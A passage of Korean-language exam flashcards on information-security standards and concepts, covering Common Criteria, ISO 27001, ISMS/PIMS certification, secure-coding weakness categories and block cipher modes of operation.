- Parties : 처리 주체
- Creation : 실현물, 아이템
- Relation : Event, Situation, Attribute
▣ 4가지 원칙
- 고유식별 : 유일성, 불변성, 안전성, 범용성
- 기능적 세분화 : 엔티티 식별
- 지정된 권위 : 창작자 식별
- 적절한 접근 : 누구나 접근
188
Q

DOI

A

▣ 관점 : 컨텐츠 식별 및 위치 추적
▣ 형식 : 코드 형식
▣ 목적 : 컨텐츠 위치 식별
▣ 표준 : 미국중심

189
Q

INDECS

A

▣ 관점 : 저작권 정보 메타 데이터
▣ 형식 : XML 형식
▣ 목적 : 상거래 이벤트 처리
▣ 표준 : 유럽 중심

190
Q

MPEG-21

A
▣ 정의
- 멀티미디어 컨텐츠의 전자상거래를 주요 응용으로 하는 멀티미디어 프레임워크
▣ 구조
- 컨텐츠의 인식 및 서술
- 컨텐츠의 관리 및 사용
- 컨텐츠/디지털 아이템 인증
- 가치교환(돈, 권리)
- 디지털 아이템의 정의
- 지적재산권 보호
- 단말기와 네트워크
▣ 구성요소
1) 디지털 항목 선언
- MPEG-7, XML/XML Schema
2) 디지털 항목 식별과 기술
- URI, DOI, ISBN
3) 컨텐츠의 취급과 사용
- 아이템 변환, 파일 포맷
4) 컨텐츠의 표현
- REL/RDD
5) 지적재산권 관리 및 보호
- 암호화 인증, 워터마킹, XrML
6) 터미널과 네트워크
- 리소스 추출, QoS 구현
7) 사건보고
▣ 기술요소
1) 압축/전송
- 컨텐츠 압축, 부호화, 멀티플렉싱
- MPEG2, MPEG4, H.264
2) 식별
- 식별자, 자원 기술
- DOI, URI, ISBN
3) 보호
- 컨텐츠 저작권 보호 기술
- XrML, IPMP, DRM
4) 메타데이터
- 메타데이터 부호화 기술
- RDF, INDECS, MPEG-7
191
Q

시큐어코딩

A
▣ 정의
- 넓은의미 : SW 생명주기의 각 단계별로 요구되는 보안활동을 모두 포함
- 좁은의미 : 구현단계에서 보안취약덤을 배제하기 위한 개발 방법
▣ 목적
- 사이버 공격 예방
- 웹 어플리케이션 취약점 개선
- 취약점 수정 비용 절감
- 보안 취약점 대응
- 전자정부 서비스 확대
- 안정성 및 신뢰성 확보
▣ 적용범위
- 입력데이터 검증 및 표현
- API 오용
- 보안 기능
- 시간 및 상태
- 에러처리
- 코드오류
- 캡슐화
▣ SW 개발 보안 활성화 활동
1) 국가 및 정부
- 보안연구 및 지속적 보안취약점 DB업데이트
- 가이드 홍보
2) 공공기관
- 정보화 사업 발주부분에 적용
- 감리부분 적용
- 개발부분 적용
3) 민간기업
- SI 프로젝트시 가이드 적용
- 교육 및 홍보
- 품질점검 활동에 적용
192
Q

시큐어 코딩 - 입력데이터 검증 및 표현

A
  • SQL 삽입
  • 자원 삽입
  • 크로스사이트 스크립트
  • 운영체제 명령어 삽입
  • 위험한 형식 파일 업로드
  • 신뢰되지 않는 URL주소 자동 접속 연결
  • XQuery 삽입
  • XPath 삽입
  • LDAP 삽입
  • 크로스사이트 요청 위조
  • 디렉토리 경로 조작
  • HTTP 응답 분할
  • 정수 오버플로우
  • 보호 메커니즘을 우회할 수 있는 입력 값 변조
193
Q

시큐어 코딩 - 보안 기능

A
  • 적절한 인증 없는 중요 기능 허용
  • 부적절한 인가
  • 중요한 자원에 대한 잘못된 권한 설정
  • 취약한 암호화 알고리즘 사용
  • 사용자 중요정보 평문 저장
  • 하드코드된 패스워드
  • 충분하지 않은 키 길이 사용
  • 적절하지 않은 난수 값 사용
  • 패스워드 평문 저장
  • 하드코드된 암호화 키
  • 취약한 패스워드 허용
  • 사용자 하드디스크에 저장되는 쿠키를 통한 정보 노출
  • 보안 속성 미적용으로 인한 쿠키 노출
  • 주석문 안에 포함된 패스워드 등 시스템 주요정보
  • 솔트없이 일방향 해쉬함수 사용
  • 무결성 검사 없는 코드 다운로드
194
Q

시큐어 코딩 - 시간 및 상태

A
  • 멀티 프로세스 상의 경쟁조건 검사시점과 사용시점 차이

- 제어문을 사용하지 않는 재귀함수

195
Q

시큐어 코딩 - 에러처리

A
  • 오류메시지 통한 정보 노출
  • 오류상황 대응 부재
  • 적절하지 않은 예외처리
196
Q

시큐어 코딩 - 코드오류

A
  • 널 포인터 역 참조

- 부적절한 자원해제

197
Q

시큐어 코딩 - 캡슐화

A
  • 잘못된 세션에 의한 데이터 정보 노출
  • 제거되지 않고 남은 디버그 코드
  • 시스템 데이터 정보노출
  • Public 메소드 부터 반환된 Private 배열
  • Private 배열에 Public 데이터 할당
198
Q

시큐어 코딩 - API 오용

A
  • DNS Lookup에 의존한 보안결정
199
Q

CC (Common Criteria) - ISO/IEC15408

A
▣ 정의
- 국가마다 서로 다른 정보보호 시스템 평가기준을 연동하고 평가결과를 상호 인증하기 위해 제정된 정보보안 평가기준
▣ 주요특징
1) 평가
- 보안기능과 보호기능
- 계층적 구조
2) 보안 등급 체계
- EAL(Evaluation Assurance Level)
- EAL0(부적절), EAL1(기능시험) ~ EAL7(정형검증)
3) 관련작성 문서
- PP(Protection Profile) : 보호프로파일
- ST(Security Target) : 보안목표명세서
4) 평가 수행지침
- CEM(Common Evalation Methodology) : 평가진행 방법론
5) 인증서 효력
- CCRA(Common Criteria Recognition Arrangement)
▣ 구성
- Part1 : CC소개 및 일반모델
- Part2 : 보안기능 요구사항
- Part3 : 보증 요구 사항
▣ 구성요소
1) Package
- 보안 컴포넌트 집합
2) PP (Protection Profile)
- 공통 요구사항 모음
- 무선랜 인증 시스템
- 통합 보안관리 시스템
- 안티바이러스 소프트웨어
- 국가 기관용 가상사설망
3) ST (Security Target)
- 벤터는 PP를 참조 후 ST 작서앟여 제품 개발
4) TOE (Target of Evaluation)
- 인증 &amp; 평가 대상 (SW, HW, FirmWare의 집합
5) SFRs (Security Functional Requirements)
- 제품이 제공하는 보안기능들
▣ 평가과정 구성요소
1) SARs(Security Assurance Requirements)
- 보안기능 준수 보증 명세
2) EAL(Evaluation Assurance Level)
- 0-7단계 보증 수준
▣ 평가 체계
1) CAP (Certificate Authorizing Participants
- 인증서 발행국
- 타국가 발행 인증서 자국인정
- 공인된 평가 및 인증기관 보유 국가
2) CCP (Certificate Consuming Participants)
- 인증서 수용국
- 타국가 발행 인증서 자국인정
- 자국 인증서 타국 불인정
▣ 인증절차 (PP->ST->TOE)
1) 평가준비
- 평가신청
- 제출물검토
- 평가계약
2) 평가진행
- 제출물 평가
- 보안기능 시험
- 취약성 분석
3) 평가인증
- 인증위원회 개최
- 인증서 교부
- 인증대장 등록
4) 사후관리
- 변경승인 신청
- 변경내역 시험
- 결과통보
200
Q

보호프로파일 PP (Protection Profile)

A
▣ 개념
- 동일한 제품이나 시스템에 적용할 수 있는 일반적인 보안기능 요구사항 및 보증요구사항 정의
▣ 독립성
- 구현에 독립적
▣ 적용성
- 제품군의 여러 제품 및 시스템에 동일한 PP 수용 가능
▣ 완전성
- 불완전한 오퍼레이션 기능
▣ 관계
- PP는 ST를 수용할 수 없음
201
Q

보안목표명세서 ST (Security Target)

A
▣ 개념
- 특정 제품이나 시스템에 적용할 수 있는 일반적인 보안기능 요구사항 및 보증요구 사항 정의
- 요구사항을 구현할 수 있는 보안기능 및 수단을 정의
▣ 독립성
- 구현에 종속적
▣ 적용성
- 특정 제품 및 시스템에 하나의 ST를 수용해야 함
▣ 완전성
- 모든 오퍼레이션은 완전해야 함
▣ 관계
- ST는 PP를 수용할 수 있음
202
Q

ISO/IEC 15408의 평가보증 등급

A
  • EAL1 : 기능시험
  • EAL2 : 구조시험
  • EAL3 : 방법론적 시험과 결정
  • EAL4 : 방법론적 시험 및 검토
  • EAL5 : 준정형적 설계 및 시험
  • EAL6 : 준정형적 검증된 설계 및 시험
  • EAL7 : 정형적 검증
203
Q

망분리

A
▣ 개념
- 외부 인터넷망과 업무망을 분리 하는 기술
▣ 방식
1) 물리적 망분리
- 2PC
- 망분리 전환 장치
- 멀티 PC
2) 논리적 망분리
- 서버 기반 가상화 : VDI(HW공유), SBC(SW공유)
- PC 기반 가상화 : CBC(VM), OS공유(APP가상화)
204
Q

ISO 27001

A
▣ 정의
- 정보보호관리체계(ISMS)에 대한 국제 표준 인증
▣ 도입배경
- 첨단 기술 및 중요 정보 유출
- 내부 정보 유출자의 증가
▣ 도입효과
- 정보시스템 보호 및 기업 비즈니스 연속성 보장
- 기업 경쟁 우위 확보 및 비즈니스 신뢰도 향상
- 적정 수준의 정보보호 관리 체계 수립
▣ 27001 인증의 목적
- 위험 최소화
- 정보보호 성과달성
- 이미지 제고
- Compliance 준수
- 기업 경영시스템 평가/인증
▣ 프로세스 (ISMS)
- Plan : 정책, 목적, 절차 수립
- Do : 구현 및 운영
- Check : 측정결과 보고
- Act : 수정적, 예방적 행동 수행
▣ 구성요소
0. 도입부 : 접근법, PDCA
1. 적용범위 : 요구적용범위
2. 인용규격 : 9001, 17799
3. 용어정의
4. 정보보안경영시스템
5. 경영책임
6. ISMS 내부심사
7. ISMS 경영검토
8. ISMS 개선
9. 부속서
▣ 3. 용어정의
- 정보, 기밀성, 무결성, 가용성, 취약성, 보호위험, 위험평가, 위험관리
▣ 구성 도메인 (정조자인물통접시침연준)
- 정보보호 정책
- 정보보호 조직 및 구성
- 자산관리
- 인적보안, 물리적&amp;환경적 보안, 통신 및 운영관리, 접근통제
- 시스템 도입 개발 유지보수
- 침해사고 대응관리
- 시험 연속성 관리
- 준거성
▣ 인증 추진 절차
1) ISMS 범위 정의
2) 위험평가/취약점 분석
3) 통제 항목 선정 및 적용성 평가
4) 절차 수립 및 구현
5) 인증 심사 지원
▣ 인증 심사 절차
1) 인증심사
- 신청 및 접수
- 인증 심사 계약
- 문서 실사
- 본 실사
- 실사 결과 검토
- 경부적합 사항의 조치계획
- 심사결과보고서의 작성
- 인증서 발급
2) 유효 실사 (6개월 단위)
3) 갱신 심사 (3년)
205
Q

ISO27001에 기초한 ISMS 구축 절차 및 도입시 고려사항

A
▣ 구축절차
1단계 : 정보보안 정책 정의
2단계 : 정보보안 경영시스템의 범위 설정 (범위는 조직의 특성, 위치, 자산 및 기술 등의 용어로 정의)
3단계 : 위험 평가 실시 (위협, 취약점, 영향도식별, 위험수준결정)
4단계 : 위험관리
5단계 : 적절한 통제 목표 및 방안 선정 (선정의 정당화)
6단계 : 적용성 보고서 작성
▣ 27001 도입 고려사항
- 인증 범위의 선정
- 통제 항목의 선정
- 지속적인 프로세스
- 사후 심사
▣ 27001 인증 획득의 기대효과
- 보안 사고 예방
- 고객 신뢰도 향상
- 보안 침해 사고 최소화
- 전사적 측면의 보안의식 제고
206
Q

ISO27001의 요구사항 및 통제항목에 대한 개인정보보호 Task

A

▣ 27001요구사항 및 Task

1) 일반적 요구사항
- ISMS개발, PDCA
2) ISMS 수립 및 관리 (PDCA)
- ISMS 수립 (Plan)
- 구현/운영 (Do)
- 모니터링/검토 (Check)
- 유지 및 개선 (Act)
3) 문서화 요구사항
- 일반 (범위 정의서, 정보자산 목록, 위험평가, 위험처리 계획, 적용성 보고서, 운영 및 이행 기록)
- 문서 통제
- 기록 통제
4) 경영진 책임
- 경영진 의지
- 자원의 경영
5) 내부 ISMS 심사
6) ISMS 경영진 검토
7) ISMS 개선
- 지속적 개선
- 시정 조치
- 예방 조치

207
Q

ISO27001의 통제항목 및 준거성 적용방안

A

1) 보안 정책
2) 정보보안 조직
- 내부조직 : CISO, CPO
- 외부자
3) 자산관리
- 자산을 위한 책임
- 정보분류
4) 인적자원 보안
- 고용 이전
- 고용 상태
- 고용의 종료 또는 변동
5) 물리적 환경적 보안
- 안전구역
- 장비 보안
6) 통신 및 운영관리
- 운영절차 및 책임
- 제3자 서비스 제공 관리
- 시스템 계획 및 인수
- 악성 및 모바일 코드에 대비한 보호
- 네트워크 보안 관리
- 미디어 취급
- 정보의 교환
- 전자상거래 서비스
- 모니터링
7) 접근통제
- 접근통제를 위한 업무 요구사항
- 사용자 접근 관리
- 사용자 책임
- 네트워크 접근통제
- 운영체제 접근통제
- 응용 및 정보 접근통제
- 모바일 컴퓨팅 및 텔레워킹
8) 정보시스템 도입, 개발 및 유지보수
- 정보시스템의 보안 요구사항
- 응용상의 교정 프로세스
- 암호화 통제
- 시스템 파일의 보안
- 개발 및 지원 프로세스상의 보안
- 기술적 취약성 관리
9) 보안 사고 관리
- 보안 이벤트 및 약점 보고
- 보안 사고 및 개선 관리
10) 사업연속성관리
11) 준거성
- 접적 요구사항의 준수
- 보안정책 및 표준, 기술적 준수사항의 준수
- 정보시스템 심사 고려사항

208
Q

ISO 27000 Family of Standards

A

1) 27000 (Overview & Vacabulary)
- ISMS 수립 및 인증에 관한 원칙과 용어를 규정하는 표준
2) 27001 (ISMS requirements standard)
- ISMS 수립, 구현, 운영, 모니터링, 검토, 유지 및 개선하기 위한 요구사항을 규정
3) 27002 (code of paratice for ISMS)
- ISMS 수립, 구현 및 유지하기 위해 공통적으로 적용할 수 있는 실무적인 지침 및 일반적인 원칙
4) 27003 (ISMS Implementation Guide)
- 보안범위 및 자산정의, 정책시행, 모니터링과 검토, 지속적인 개선등 ISMS구현을 위한 프로젝트 수행시 참고할 만한 구체적인 구현 권고사항을 규정한 규격으로, 문서구조를 프로젝트 관리 프로세스에 맞춰 작성
5) 27004 (ISMS Measurement)
- ISMS에 구현된 정보보안통제의 유효성을 측정하기 위한 프로그램과 프로세스를 규정한 규격으로 무엇을, 어떻게, 언제 측정할 것인지를 제시하여 정보보안의 수준을 파악하고 지속적으로 개선시키기 위한문서
6) 27005 (certification or registration process)
- ISMS 인증기관을 인정하기 위한 요구사항을 명시한 표준으로서 인증기관 및 심사인의 자격요건등을 기술
7) 27011 (ISMS guideline for telecommunications organizaions)
- 통신분야에 특화된 ISMS 적용실무 지침으로서 ISO/IEC 27002와 함께 적용 (ITU X.1051)
8) 27033 (IT network security)
- 네트워크시스템의 보안관리와 운영에 대한 실무지침으로 27002의 네트워크보안통제를 구현관점에서 기술한 문서
9) 27799 (Health Organizations)
- 의료정보분야에 특화된 ISMS 적용실무지침으로 27002와 함께 적용

209
Q

ISMS (Information Security Management System)

A
▣ 정의
- 정보통신망의 안전성 확보를 위하여 수립/운영하고 있는 기술적/물리적 보호조치등 종합적인 관리체계에 대한 인증제도
▣ 인증필요 대상
- 입찰 참여 기업
- 외부평가 대상 기업 : IT경영평가, 신용평가, 회계감사
- 중요자산 취급분야 : 금융, 교육, 의료, 통신, 포탈, 기술
- 고객정보 아웃소싱 기업
▣ ISMS 수립방안
1) 수립절차
2) 정보보호 관리체계 수립
3) 정보보호 정책 및 조직
4) 자산식별, 범위설정 및 위험관리
5) 정보보호대책구현 및 운영
6) 사후관리
▣ 인증추진 체계
1) 정보통신위원회
- 법, 제도 개선 및 정책 결정
2) 인증위원회
- 인증심사결과 심의
- 인증취소의 타탕성 심의
- 학계, 연구기관 등 관련
- 전문가 5인 이상 10명 이내로 구성
3) 인증기관(KISA)
- 인증심사 신청 접수
- 인증심사 기준, 지침 개발
- 인증 활성화 및 제도 개선
- 인증서 발급 및 관리
- 인증위원회 및 인증심사원 풀 운영
- 기술자문 및 상담
- 인증심사 및 사후관리 등
4) 인증심사원 풀
- 인증 심사 지원
- 각 분야별 외부 전분가로 구성(223명)
▣ ISMS 관리과정 (정범위구사)
1) 정보보호 정책수립
- 정보보호정책의 수립
- 조직 및 책임 설정
2) 관리체계 범위설정
- 정보보호관리체계 범위설정
- 정보자산의 식별
3) 위험관리
- 위험관리전략 및 계획수립
- 위험분석
- 위험평가
- 정보보호대책 선택
- 정보보호계획 수립
4) 구현
- 정보보호대책의 효과적 구현
- 정보보호 교육 및 훈련
5) 사후관리
- 정보보호관리체계의 재검토
- 모니터링 및 개선
- 내부감사
210
Q

ISMS 심사기준

A

1) 정보보호 관리과정
- 정보보호 정책 수립
- 관리체계 범위 설정
- 위험관리
- 구현
- 사후관리
2) 문서화
- 문서요건
- 문서의 통제
- 운영기록의 통제
3) 정보보호 대책(정조외 자교인물, 시암접운 전보검업)
- 정보보호 정책
- 정보보호 조직
- 외부자보안
- 정보자산 분류
- 정보보호 교육 및 훈련
- 인적보안
- 물리적보안
- 시스템개발보안
- 암호통제
- 접근통제
- 운영관리
- 전자거래보안
- 보안사고관리
- 검토, 모니터링, 감사
- 업무연속성관리

211
Q

PIMS (Personal Information Management System)

A
▣ 정의
- 이용자의 개인정보를 안전하게 보호할 수 있는 기술적, 관리적, 물리적, 조직적인 다양한 보호 대책을을 구현하고 지속적으로 관리, 운영하는 종합적인 체계
▣ 장점
- 신뢰성 및 객관성 확보
- 보호역량 향상
- 정책지원
▣ 인증 프레임워크
1) 관리과정 요구사항
- 정책수립
- 범위설정
- 위험관리
- 구현
- 사후관리
2) 보호대책요구사항 (정조개 교훈인 침기물 내감)
- 정책 및 조직
- 개인정보 분류
- 교육 및 훈련
- 인적보안
- 침해사고대응
- 기술, 물리보호 조치
- 내부검토 및 감사
3) 생명주기 요구사항
- 수집
- 이용 및 제공
- 관리 및 폐기
▣ 인증 체계
1) 인정기관
- 인증기관 지정 및 감독
- 방송통신위원회
2) 인증위원회
- 인증 심사 결과 검증
- 외부전문가
3) 인증기관
- 인증 심사 수행 및 결과 보고
- KISA
4) 피인증기관
- 인증신청
▣ 인증심사 종류
- 인증심사
- 갱신심사
- 재심사
- 사후관리심사
▣ PIMS 체계 수립 절차
- 정책수립
- 범위설정
- 위험관리
- 구현
- 사후관리
212
Q

PIPL (Personal Information Protection Level) : 개인정보보호 인증제

A
▣ 정의
- 개인정보를 수집, 이용하고 있는 공공기관 및 민간기업이 개인정보보호법이 요구하는 일련의 보호조치와 활동을 이행, 일정수준 이상을 달성함을 승인하는 제도
▣ 설계원칙
- 개인정보 측면 : 개인정보의 특성반영, 단계별 처리
- 보호체계 측면 : 지속적인 관리, 전사적인 보호조치
- 인증 측면 : 실행 가능한 통계, 문서화, 유관 법련 준수
▣ 인증기관
- 행정자치부
- 한국정보화진흥원(인증기관)
- 인증위원회
▣ 인증대상
1) 공공부문
- 공공기관
2) 민간부문
- 대기업
- 중소기업
- 소상공인
▣ 유형 및 체계
1) 개인정보 보호 관리체계
- 관리체계 수립
- 실행 및 운영
- 검토 및 모니터링
- 교정 및 개선
2) 개인정보 보호대책
- 개인정보처리 (수집, 이용, 제공, 저장, 파기)
- 정보주체 권리보장
- 관리적 안정성 확보조치
- 기술적 안정성 확보조치
- 물리적 안정성 확보조치
▣ 인증 절차
1) 인증심사 준비단계
- 사전준비
- 인증 심사 신청
- 사전 점검
- 인증계약 체결
2) 심사단계
- 인증심사
- 보완조치
3) 인증단계
- 인증 위원회 개최
- 인증서 발급
213
Q

공인인증의 대체인증수단

A
▣ 폐지 추진 배경
- 전자금융감독 규정 시행세칙(14.5.20) : 30만원 이상 거래시 의무사용 폐지
- 전자금융거래법 (15.4.16) : 전자상거래 카드결제 시 공인인증서 사용의무 폐지
▣ 기존 공인인증서의 문제점
- ActiveX의 취약점
- 기술의 폐쇄성
- 유출 취약성
- IT갈라파고스 : 인증 기술의 자율 경쟁 기회 박탈
- 관치보안 : 관리 효율성에 초점, 사용자의 선택권 박탈
▣ 긍정적인 영향
1) 사용자 측면
- 편의성 증대
- SW 호환성
- 안정성
2) 사업자 측면
- 인증 기술 발전
- 기술 선택권
- 글로벌 진출 기반
▣ 부정적 영향
- 공신력 확보를 통한 원활한 서비스 부재
- 다양한 공통 인증서비스 영역에 활용불가
- 부인방기 기능 확보 필요
- 현재 공인 인증서 인프라 활용성 부재
▣ 공인 인증서의 대체 인증 수단
- SSL + OTP
- 보안 토큰 기반 대칭키
- 거래연동 OTP
- FIDO
- 웹브라우저 확장기능(샌드박스)
- 전용 SW 기반 구현
- 웹 표준 기술 활용
▣ 활성화 방안
- 안정성 확보
- 법률적 근거 명확화
- 기술 표준화
- 인프라 구축
▣ 대체 기술 동향
- 스마트 OTP : HW방식 OTP
- SMS : 인증 문자
- 생체인증 : 홍채, 지문
- USIM
- NFC
- WEB 화상통화
214
Q

PIA (Privacy Impact Analysis) : 개인정보영향평가

A
▣ 정의
- 개인 프라이버시에 미치는 영향에 대하여 사전에 조사, 예측, 검토하여 개선 방안을 도출하는 체계적인 활동
▣ 개인정보영향평가의 대상
1) 공공기관
- 개인정보 침해
- 민간정보/고유식별처리사업
- 개인정보파일 연계사업 (50만명 이상)
- 개인정보파일 사업 (100만명이상)
- 시스템 변경분
2) 민간기관
- 사회적 피해를 막기 위해 수행 가능
▣ 평가절차
1) 평가 계획의 수립
- 영향평가 필요성 검토
- 영향평가 수행주체 선정
- 영향평가 수행계획 수립
2) 영향 평가 실시
- 평가자료수집
- 개인정보 흐름분석
- 개인정보 침해요인 분석
3) 평가 결과의 정리
- 개선계획 수립
- 보고서 작성
▣ 개인정보 흐름분석활동
- 개인정보 취급현황 분석
- 개인정보 취급업무 흐름도 작성
- 개인정보 취급업무 흐름표 작성
▣ 개인정보 침해요인 분석활동
1) 영향평가 영역구성
- 평가기준 : 개인정보보호법, 표준개인정보보호지침, 개인정보 안전성 확보조치 기준
- 4개 평가영역 : 평가기관의 개인정보보호 관리체계, 대상시스템의 개인정보 보호 관리체계, 개인정보처리 단계별 보호, 특정 IT기술 활용 시 개인정보 보호
2) 개인정보 침해요인 도출
- 인터뷰
3) 개인정보 위험도 산정
- 법적 준거성 및 침해요인 발생 가능성 값 산정
4) 개선방안 도출
- 단기, 중기, 장기로 구분하여 개선방안 도출
▣ 개인정보영향평가 역량 강화를 위한 CSF(Critical Success Factor)
- 개인정보영향평가 인력양성
- CPO 임명
- 공통 프레임워크
- 영향평가 출의 사용
- 컨설팅 활동
215
Q

블록암호화 알고리즘

A
▣ 정의
- 평문을 일정한 블록단위로 나누어서 각 블록마다 암호화 과정을 수행하여 고정된 크기의 블록 단위의 암호문을 생성하는 기술
▣ 암호화 개념
- 128bit 암호화를 한다고 가정하면, 평문을 128bit로 나눈 다음 암호화
▣ 알고리즘 유형
1) 암호화가 각 블록에 독립적으로 작용하는 운영모드
- ECB (Electronic Code Block)
- CTR (CounTeR)
2) 이전브록의 암호화 값이 다음 블록에 영향을 주는 운영모드
- CBC (Cipher Block Chaining)
- CFB (Cipher FeedBack)
- OFB (Output FeedBack)
216
Q

블록암호화 알고리즘 유형

A

□ ECB(Electronic Code Book) : 전자 장비를 이용한(=Electronic) 암호화 방식(=Code book)

○ 암호화(En) : En(P[i])

○ 복호화(De) : De(C[i])

□ CTR(CounTeR) : 카운터(=Counter)가 암호화됨

○ 암호화(En→XOR) : XOR(En(CTR[i]), P[i])

○ 복호화(En→XOR) : XOR(En(CTR[i]), C[i])

□ CBC(Cipher Block Chaining) : 암호문(=Cipher block)이 다음 단계 평문과 XOR(=Chaining)됨

○ 암호화(XOR→En) : En(XOR(P[i], C[i-1]))

○ 복호화(De→XOR) : XOR(De(C[i]), C[i-1])

□ CFB(Cipher FeedBack) : 암호문(=Cipher)이 다음 단계 암호알고리즘의 입력(=Feedback)이 됨

○ 암호화(En→XOR) : XOR(En(C[i-1]), P[i])

○ 복호화(En→XOR) : XOR(En(C[i-1]), C[i])

□ OFB(Output FeedBack) : 암호 알고리즘의 결과(=Output)는 다음 암호알고리즘의 입력(=Feedback)이 됨

○ 암호화(En→XOR) : XOR(En(IV)[i], P[i])

○ 복호화(En→XOR) : XOR(En(IV)[i], C[i])

P.S. 기호 안내

  • En:암호화(Encryption) / De:복호화(Decryption)
  • C:암호문 블록(Cipher text) / P:평문 블록(Plain text)
  • i:각 단계(Ex. 현재 단계:i / 하나 이전 단계:i-1 / 하나 다음 단계:i+1)